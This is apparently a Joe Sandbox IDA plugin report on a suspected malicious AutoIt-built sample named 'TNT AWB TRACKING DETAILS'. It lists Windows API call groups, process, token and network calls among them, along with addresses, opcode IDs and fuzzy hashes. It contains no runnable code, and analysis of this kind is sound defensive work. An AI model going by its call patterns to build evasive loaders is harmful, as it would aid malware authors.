                                                    • API String ID: 2267087916-0
                                                    • Opcode ID: 883acbd4e77cf253a50acff92e2aef4ccd528350a3de2484f4678ee59baf1eac
                                                    • Instruction ID: e821a19f826b70eccc63187157ea4162905c214cb7a69d7bbd89900f7a29f545
                                                    • Opcode Fuzzy Hash: 883acbd4e77cf253a50acff92e2aef4ccd528350a3de2484f4678ee59baf1eac
                                                    • Instruction Fuzzy Hash: 8B21D6795083158F8300EF24D88196B7BE4EE5A364F104A2DF4D9C72A1D739DE4ADF42
                                                    APIs
                                                      • Part of subcall function 00F1F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00F1DCD3,?,?,?,00F1EAC6,00000000,000000EF,00000119,?,?), ref: 00F1F0CB
                                                      • Part of subcall function 00F1F0BC: lstrcpyW.KERNEL32(00000000,?,?,00F1DCD3,?,?,?,00F1EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F1F0F1
                                                      • Part of subcall function 00F1F0BC: lstrcmpiW.KERNEL32(00000000,?,00F1DCD3,?,?,?,00F1EAC6,00000000,000000EF,00000119,?,?), ref: 00F1F122
                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00F1EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F1DCEC
                                                    • lstrcpyW.KERNEL32(00000000,?,?,00F1EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F1DD12
                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00F1EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F1DD46
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: lstrcmpilstrcpylstrlen
                                                    • String ID: cdecl
                                                    • API String ID: 4031866154-3896280584
                                                    • Opcode ID: 794ad2bc0177174d0cc59f01f371e5df89b2af12c03a1912de86474675efe899
                                                    • Instruction ID: d50f5737d67ff8926166623b67f3ec17258fda56dc74b303b14b9e5b14bc3fc4
                                                    • Opcode Fuzzy Hash: 794ad2bc0177174d0cc59f01f371e5df89b2af12c03a1912de86474675efe899
                                                    • Instruction Fuzzy Hash: DC11D33A600309EBCB259F34DC45DBA77B9FF45350B40902AF806CB2A0EB719880E791
                                                    APIs
                                                    • _free.LIBCMT ref: 00EF5101
                                                      • Part of subcall function 00EE571C: __FF_MSGBANNER.LIBCMT ref: 00EE5733
                                                      • Part of subcall function 00EE571C: __NMSG_WRITE.LIBCMT ref: 00EE573A
                                                      • Part of subcall function 00EE571C: RtlAllocateHeap.NTDLL(01840000,00000000,00000001,00000000,?,?,?,00EE0DD3,?), ref: 00EE575F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap_free
                                                    • String ID:
                                                    • API String ID: 614378929-0
                                                    • Opcode ID: 9e109eac45363d031a884d12f7e1760039947d5e2aa189f4080918f466bc90fd
                                                    • Instruction ID: f787c2d96b7733a98cafca980563b66cb6871cf002835456a6e474980b6524ce
                                                    • Opcode Fuzzy Hash: 9e109eac45363d031a884d12f7e1760039947d5e2aa189f4080918f466bc90fd
                                                    • Instruction Fuzzy Hash: 7311E373502E1DAECB312FB1AC05BBE37D89B21365F102529FB0CB6251DF3099409790
                                                    APIs
                                                    • _memset.LIBCMT ref: 00EC44CF
                                                      • Part of subcall function 00EC407C: _memset.LIBCMT ref: 00EC40FC
                                                      • Part of subcall function 00EC407C: _wcscpy.LIBCMT ref: 00EC4150
                                                      • Part of subcall function 00EC407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EC4160
                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00EC4524
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EC4533
                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EFD4B9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                    • String ID:
                                                    • API String ID: 1378193009-0
                                                    APIs
                                                      • Part of subcall function 00EC5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F27896,?,?,00000000), ref: 00EC5A2C
                                                      • Part of subcall function 00EC5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F27896,?,?,00000000,?,?), ref: 00EC5A50
                                                    • gethostbyname.WSOCK32(?), ref: 00F36399
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F363A4
                                                    • _memmove.LIBCMT ref: 00F363D1
                                                    • inet_ntoa.WSOCK32(?), ref: 00F363DC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                    • String ID:
                                                    • API String ID: 1504782959-0
                                                    APIs
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00F18B61
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F18B73
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F18B89
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F18BA4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    APIs
                                                      • Part of subcall function 00EC2612: GetWindowLongW.USER32(?,000000EB), ref: 00EC2623
                                                    • DefDlgProcW.USER32(?,00000020,?), ref: 00EC12D8
                                                    • GetClientRect.USER32(?,?), ref: 00EFB5FB
                                                    • GetCursorPos.USER32(?), ref: 00EFB605
                                                    • ScreenToClient.USER32(?,?), ref: 00EFB610
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                    • String ID:
                                                    • API String ID: 4127811313-0
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F1FCED,?,00F20D40,?,00008000), ref: 00F2115F
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00F1FCED,?,00F20D40,?,00008000), ref: 00F21184
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F1FCED,?,00F20D40,?,00008000), ref: 00F2118E
                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,00F1FCED,?,00F20D40,?,00008000), ref: 00F211C1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CounterPerformanceQuerySleep
                                                    • String ID:
                                                    • API String ID: 2875609808-0
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00F1D84D
                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00F1D864
                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00F1D879
                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00F1D897
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                    • String ID:
                                                    • API String ID: 1352324309-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                    • String ID:
                                                    • API String ID: 3016257755-0
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00F4B2E4
                                                    • ScreenToClient.USER32(?,?), ref: 00F4B2FC
                                                    • ScreenToClient.USER32(?,?), ref: 00F4B320
                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F4B33B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                    • String ID:
                                                    • API String ID: 357397906-0
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F4B644
                                                    • _memset.LIBCMT ref: 00F4B653
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F86F20,00F86F64), ref: 00F4B682
                                                    • CloseHandle.KERNEL32 ref: 00F4B694
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memset$CloseCreateHandleProcess
                                                    • String ID:
                                                    • API String ID: 3277943733-0
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(?), ref: 00F26BE6
                                                      • Part of subcall function 00F276C4: _memset.LIBCMT ref: 00F276F9
                                                    • _memmove.LIBCMT ref: 00F26C09
                                                    • _memset.LIBCMT ref: 00F26C16
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00F26C26
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                    • String ID:
                                                    • API String ID: 48991266-0
                                                    APIs
                                                    • GetSysColor.USER32(00000008), ref: 00EC2231
                                                    • SetTextColor.GDI32(?,000000FF), ref: 00EC223B
                                                    • SetBkMode.GDI32(?,00000001), ref: 00EC2250
                                                    • GetStockObject.GDI32(00000005), ref: 00EC2258
                                                    • GetWindowDC.USER32(?,00000000), ref: 00EFBE83
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EFBE90
                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 00EFBEA9
                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 00EFBEC2
                                                    • GetPixel.GDI32(00000000,?,?), ref: 00EFBEE2
                                                    • ReleaseDC.USER32(?,00000000), ref: 00EFBEED
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                    • String ID:
                                                    • API String ID: 1946975507-0
                                                    APIs
                                                    • GetCurrentThread.KERNEL32 ref: 00F1871B
                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,00F182E6), ref: 00F18722
                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00F182E6), ref: 00F1872F
                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00F182E6), ref: 00F18736
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CurrentOpenProcessThreadToken
                                                    • String ID:
                                                    • API String ID: 3974789173-0
                                                    APIs
                                                    • __getptd_noexit.LIBCMT ref: 00EE5DAD
                                                      • Part of subcall function 00EE99C4: GetLastError.KERNEL32(00000000,00EE0DD3,00EE8B2D,00EE57A3,?,?,00EE0DD3,?), ref: 00EE99C6
                                                      • Part of subcall function 00EE99C4: __calloc_crt.LIBCMT ref: 00EE99E7
                                                      • Part of subcall function 00EE99C4: __initptd.LIBCMT ref: 00EE9A09
                                                      • Part of subcall function 00EE99C4: GetCurrentThreadId.KERNEL32 ref: 00EE9A10
                                                      • Part of subcall function 00EE99C4: SetLastError.KERNEL32(00000000,00EE0DD3,?), ref: 00EE9A28
                                                    • CloseHandle.KERNEL32(?,?,00EE5D8C), ref: 00EE5DC1
                                                    • __freeptd.LIBCMT ref: 00EE5DC8
                                                    • ExitThread.KERNEL32 ref: 00EE5DD0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit__initptd
                                                    • String ID:
                                                    • API String ID: 4169687693-0
                                                    • Opcode ID: 117d2222aaead42c31db7aa573e377b44df7d5759013073bf6ba14f13137ec9f
                                                    • Instruction ID: 41870cdae4195bd4923e62c3fe18f158d057fdee5270458940a72dcfc56d2d00
                                                    • Opcode Fuzzy Hash: 117d2222aaead42c31db7aa573e377b44df7d5759013073bf6ba14f13137ec9f
                                                    • Instruction Fuzzy Hash: 50D0A732001F5847C2322B718C0D63A33D09F01B29F049218F469651F28B2058028A41
                                                    APIs
                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 00F1B4BE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ContainedObject
                                                    • String ID: AutoIt3GUI$Container
                                                    • API String ID: 3565006973-3941886329
                                                    • Opcode ID: 064e58648765fc0cef0a307d8fcc2654499a71598e2c4a9785830aeccd9c25dc
                                                    • Instruction ID: 966da145adfa87bf13058f7a938f8fde5f640f6e209bc5e0f7a8e3acf705cebf
                                                    • Opcode Fuzzy Hash: 064e58648765fc0cef0a307d8fcc2654499a71598e2c4a9785830aeccd9c25dc
                                                    • Instruction Fuzzy Hash: 86915871600601EFDB14DF68C884BAAB7E5FF49710F24856EE94ACB2A1DB71E881DB50
                                                    APIs
                                                      • Part of subcall function 00EDFC86: _wcscpy.LIBCMT ref: 00EDFCA9
                                                      • Part of subcall function 00EC9837: __itow.LIBCMT ref: 00EC9862
                                                      • Part of subcall function 00EC9837: __swprintf.LIBCMT ref: 00EC98AC
                                                    • __wcsnicmp.LIBCMT ref: 00F2B02D
                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00F2B0F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                    • String ID: LPT
                                                    • API String ID: 3222508074-1350329615
                                                    • Opcode ID: 6b8ac7013e3a97254e0dd7651b04e9aea983cd1ded9a9b27849553cda959ac56
                                                    • Instruction ID: 4d345f331a8bcdcfaa3f66eec403ec54dadb10878ed38fce937d538801e2d04f
                                                    • Opcode Fuzzy Hash: 6b8ac7013e3a97254e0dd7651b04e9aea983cd1ded9a9b27849553cda959ac56
                                                    • Instruction Fuzzy Hash: 19619276E00229AFCB18DF94D895EAEB7F4EF08710F104069F916AB391D770AE81DB50
                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 00ED2968
                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00ED2981
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: GlobalMemorySleepStatus
                                                    • String ID: @
                                                    • API String ID: 2783356886-2766056989
                                                    • Opcode ID: f69069309185164b6fc71e90139f2003edd9a29fcda901e3afa6ddd0b2ae701e
                                                    • Instruction ID: 4c6bc218ecc6a51b5e72663f6cad98ab7bec6a0e980794f9541788d85049f0d4
                                                    • Opcode Fuzzy Hash: f69069309185164b6fc71e90139f2003edd9a29fcda901e3afa6ddd0b2ae701e
                                                    • Instruction Fuzzy Hash: 34515A724087489BD320EF10DD86BAFBBE8FF85344F41485DF2D8521A2DB719529CB66
                                                    APIs
                                                      • Part of subcall function 00EC4F0B: __fread_nolock.LIBCMT ref: 00EC4F29
                                                    • _wcscmp.LIBCMT ref: 00F29824
                                                    • _wcscmp.LIBCMT ref: 00F29837
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp$__fread_nolock
                                                    • String ID: FILE
                                                    • API String ID: 4029003684-3121273764
                                                    • Opcode ID: 8b870828cba9041b7d843090aa57a9c765cdad45e2c129f9f25fd6f7f6c6ec7d
